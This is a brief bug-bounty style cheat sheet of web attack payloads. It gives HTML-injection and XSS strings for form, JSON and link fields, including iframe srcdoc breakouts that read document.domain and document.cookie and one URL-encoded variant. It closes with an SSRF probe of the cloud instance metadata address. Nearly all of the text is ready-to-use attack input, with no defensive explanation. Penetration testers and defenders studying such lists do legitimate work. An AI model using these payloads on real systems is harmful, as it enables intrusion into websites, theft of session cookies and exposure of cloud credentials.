

HTML Innjection:
----------------
<u>TestHTML</u>

"><img src=x onerror=alert(1)>

"><<img onerror=alert(document.domain) src>

%5C%22%3E%3C%3Cimg%20onerror%3Dalert%2855%29%20src%3E


In json fields through burp:
-----------------------------
<img src=x onerror=alert(1)>


Insert Link/url field:
----------------------
XSS<iframe></textarea></iframe><iframe srcdoc="<img src onerror=alert(document.domain)>">

XSS<iframe></textarea></iframe><iframe srcdoc="<img src onerror=alert(document.cookie)>">



https://gist.github.com/soaj1664/9588791


SSRF
http://169.254.169.254/latest/meta-data/
